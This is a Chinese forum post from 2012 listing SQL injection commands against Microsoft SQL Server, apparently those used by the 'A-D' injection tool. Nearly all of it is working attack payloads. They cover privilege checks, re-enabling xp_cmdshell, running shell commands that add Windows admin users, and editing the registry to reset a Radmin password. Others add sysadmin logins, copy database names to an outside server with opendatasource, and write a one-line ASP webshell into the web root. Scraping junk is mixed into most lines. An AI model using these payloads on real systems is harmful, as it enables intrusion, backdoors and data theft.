找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1843|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令: a9 [# E7 K, [/ M  E4 S
//看看是什么权限的: A" P) y- l! P) m: ]" P
and 1=(Select IS_MEMBER('db_owner'))
0 j% e% V- L5 G9 vAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--& K" g4 K! A- q. d% i

1 X/ q7 L- \2 G8 Y) k//检测是否有读取某数据库的权限* o& x0 l: E& |' [& H, C8 Q
and 1= (Select HAS_DBACCESS('master'))
9 N' P3 Y7 A2 E2 S1 S3 BAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
1 i; m. O: ]# Q+ y
6 B# {( H( ~" A2 d4 i( q0 B. B1 J' c6 W% c* W4 m- A  a
数字类型
# X& t# i6 ]; f% d' ?2 I4 zand char(124)%2Buser%2Bchar(124)=0" @# F* ?+ _8 F" g) ]
& ^; V7 |( [+ X- T! Z  j- B' a( d
字符类型0 k0 v2 f, V/ X  N6 g, U! {
' and char(124)%2Buser%2Bchar(124)=0 and ''='
( T' f% }; T1 b' v5 f3 d
- A# k. x' D4 g& y搜索类型+ t: |+ j1 m; ?" j0 b0 O
' and char(124)%2Buser%2Bchar(124)=0 and '%'='& o0 {3 P* N7 w; {* L: ]! v
, L1 W7 q2 y+ m* q
爆用户名
" A! i5 m; _6 O; S/ p0 c: U5 Eand user>05 R5 r: r( t; ~: O8 |( @/ q
' and user>0 and ''='
! [' T3 Y4 b" z4 E0 M: g$ J2 |! z+ ?9 a* I  H* I. u# y( j7 k
检测是否为SA权限
+ o  d& Q# u# V" `: ~& C4 p2 Gand 1=(select IS_SRVROLEMEMBER('sysadmin'));--# \. p* h4 {7 b% V/ o4 f  e0 |
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
, B/ b6 h7 J/ a' y4 K$ E# |% P8 x$ O1 U9 N
检测是不是MSSQL数据库
+ ]4 F+ _5 W" L# }* _" U8 X( ?" Wand exists (select * from sysobjects);-- 4 W7 T# b' f6 T, J: Y; i

$ e; T+ i9 {7 \& U# e检测是否支持多行
, \% Q* U% f# {2 i! p9 U;declare @d int;--
. F# p' i* Q% S$ b/ Z" o0 g! G9 O
# k8 A5 m  Q# ~, v* q: e1 R) a3 u恢复 xp_cmdshell+ Y) N' n; R' a( h( a$ D0 D
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--% g: u$ X# E* @2 Y7 O9 t

0 [: S! B9 Y4 }+ ^0 C
: a, d% |# f7 c3 [5 ]select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')
$ s( L2 m7 v: [# C0 c, z8 r2 h* A6 B+ Y
//-----------------------
0 m! s* \! t4 V3 J$ B3 x//      执行命令2 j$ Q0 j( E4 u' w! A0 a
//-----------------------
& X- Z" `' t) {: _$ [首先开启沙盘模式:& @3 h1 \: Z  ^8 T4 S. V
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
0 u" \! ?6 K, c- n0 s& y2 \- K6 b# ~$ @3 Z6 {' `, q2 }8 r+ y( `
然后利用jet.oledb执行系统命令. ~# y  A6 c' R. d1 J7 P- N
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')+ v6 W9 E5 H* M2 D$ G

! F9 s4 b/ K- \执行命令
1 x* U7 V# I$ ]9 M;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--$ D3 E& m+ l7 _$ W- P& \
( m, U2 N* ?8 r7 Z, t" |
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
, A% {( s" _/ ]% Y9 s1 _: L/ |
0 Q* R1 t& L; o# k9 ]  x4 H# `判断xp_cmdshell扩展存储过程是否存在:
7 e% ^" X2 r. `3 l, ]http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
% y0 O$ v+ h  {( Z: J6 ~0 {( a# F' V2 r, ~8 J1 @
写注册表4 ~' s( D/ M) e: Y$ v
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
8 S3 [/ B+ v1 U- r# {! |' _# {% z# n" U4 Y9 g4 e: C2 U  c; G
REG_SZ# k  _/ W& o- H! q9 u: L( o

) I- k7 {; D. X1 f读注册表6 y% [/ X1 G' f+ v1 J
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
. B# a7 [7 s& t) I0 x0 p, K; D% q3 W# I* K6 ^! }
读取目录内容" g& v9 x. C. k$ ^2 r  A- R+ G
exec master..xp_dirtree 'c:\winnt\system32\',1,1- C# W; W' u' v) }( K4 `5 r
7 j1 S& e6 R! y* o" u# }8 y

( y) Q, T% A+ R' r! G数据库备份
' n/ |& Z/ B; s+ D* d% ~backup database pubs to disk = 'c:\123.bak'
! I( u' ^. I* \$ D; p/ q3 Z0 _8 V; Q! ~. H# ^
//爆出长度
0 L5 k# X. Q4 A7 f5 V8 \$ qAnd (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--' T+ E! D- W5 o) r4 \

# p, n4 z* n* ~, z) G* J* _# K+ s6 ]
) `& q( S7 y# }8 ^( R& W0 ?
更改sa口令方法:用sql综合利用工具连接后,执行命令:
+ @7 L2 h4 x7 ?exec sp_password NULL,'新密码','sa'
2 e/ x$ F1 Q8 q/ N$ C5 ?* r
4 ^; A8 [4 b* S6 K) f0 t. P添加和删除一个SA权限的用户test:
) S7 ^/ P) f) w! W) dexec master.dbo.sp_addlogin test,ptlove
! b6 y, A1 I. n2 n4 k* T8 G: x) Texec master.dbo.sp_addsrvrolemember test,sysadmin3 T4 R: n! W# M" D: K6 c3 O: n0 f

( r- m/ F# f- V9 S4 l7 B4 X: d- q7 x删除扩展存储过过程xp_cmdshell的语句:
5 G8 X' P5 ^8 Q; A) N( dexec sp_dropextendedproc 'xp_cmdshell'4 {) [9 F8 N# N  c$ `! a& Z
2 @: g, a- z% u( d- Z- Y: N
添加扩展存储过过程
5 S. Y) q9 ~* C$ HEXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' , _% M/ h& B/ D' k
GRANT exec On xp_proxiedadata TO public ' o' g) E' C6 W9 H) p! C* s: K
* F/ _7 w' X- ?5 P& q

" B: C" A6 w+ W) ^7 f停掉或激活某个服务。 , Q0 B* e$ Y$ n( D0 g& j6 n3 n

0 [% _9 v( P: zexec master..xp_servicecontrol 'stop','schedule'4 k# c1 i/ r6 i$ O8 S9 S/ t
exec master..xp_servicecontrol 'start','schedule'+ I) P+ ?5 N* S$ ]/ U

- F5 {4 E, A" _' ?  R% [$ v7 E) hdbo.xp_subdirs
, i3 L( w$ M! f* E+ v! c# e; v% O6 \% @  o. O6 K( g1 S
只列某个目录下的子目录。. F% R8 b' A& o; Y# N9 y  w
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'1 ^8 K6 {; t+ S% E* J
* |0 g; @& n# G/ {. v8 X
dbo.xp_makecab5 X' d3 |! ]6 P9 F* R/ T$ M2 }; J
/ M7 `, O, h. u$ Y
将目标多个档案压缩到某个目标档案之内。
" A* D6 |2 A5 F, u  R所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。8 t: ]) N  g" g& Z1 g# t- f

3 v  Z% B) R9 M1 D0 g  w) M/ }dbo.xp_makecab
/ m2 w# c7 K, c( B; S5 E6 q'c:\test.cab','mszip',1,
# J) G$ }% ^7 I; ?! H1 I: R'C:\Inetpub\wwwroot\SQLInject\login.asp',) k5 c$ T% n/ C
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'* M7 ~1 R/ N1 X

% K+ x8 {* `8 w, R/ Jxp_terminate_process" B, A% N3 ~* N: b) z/ p

- Q% v. F1 w! x5 i停掉某个执行中的程序,但赋予的参数是 Process ID。: n! I' I" Q9 h3 K( O! V$ A
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID% l/ o7 ?1 B3 x

) h. u2 j' O. \& Txp_terminate_process 2484  K6 n. t* M# E5 h, K7 W

/ o  w$ L2 D! v9 {xp_unpackcab
: u$ `( B- Z7 ?2 L5 D" j  s7 K2 T: k2 }
解开压缩档。, E+ t5 F) N3 g- ?  x: @" s
1 {5 ^) G- a- n, s) P3 k
xp_unpackcab 'c:\test.cab','c:\temp',1
5 K. V9 S9 O) j. H3 m, J2 E/ A2 B; m* B9 q. U0 p

  W+ N3 R8 u' K) v某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
; c9 z, Z4 {7 A# r) a; o" L0 f( V: H
create database lcx;$ k1 g! G, X+ s: V; K, w1 ?
Create TABLE ku(name nvarchar(256) null);( C! e- f  j1 ^$ w- i
Create TABLE biao(id int NULL,name nvarchar(256) null);' R8 F8 J& J, Q0 u. ^
5 L6 T1 Y# f2 h( L& a
//得到数据库名
. @# A1 g- a; f2 Pinsert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases0 X. g/ Q2 [4 X* i4 Q0 |+ i

5 ^, o2 ~+ G; C9 l7 j8 H- B6 ~. l: f
//在Master中创建表,看看权限怎样
; I4 W' F* N) uCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--/ {5 d0 ?+ E8 {* X% ^% y4 e' Y
8 L% B" x8 N# A2 Z3 Y  Z$ D
用 sp_makewebtask直接在web目录里写入一句话马:" e( Y) i0 C, y5 D
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--3 i6 }1 S. V* L) x; T& D. G3 ~

+ n: T4 b! F5 i" W$ i: G//更新表内容) D! O; B0 |! O7 D$ t
Update films SET kind = 'Dramatic' Where id = 123  P; {. z/ p& Z) [2 }5 z9 l

: ^. ?$ m  F0 @8 n7 {$ _" A//删除内容9 Y4 O9 J( w  z* G  ~7 F
delete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表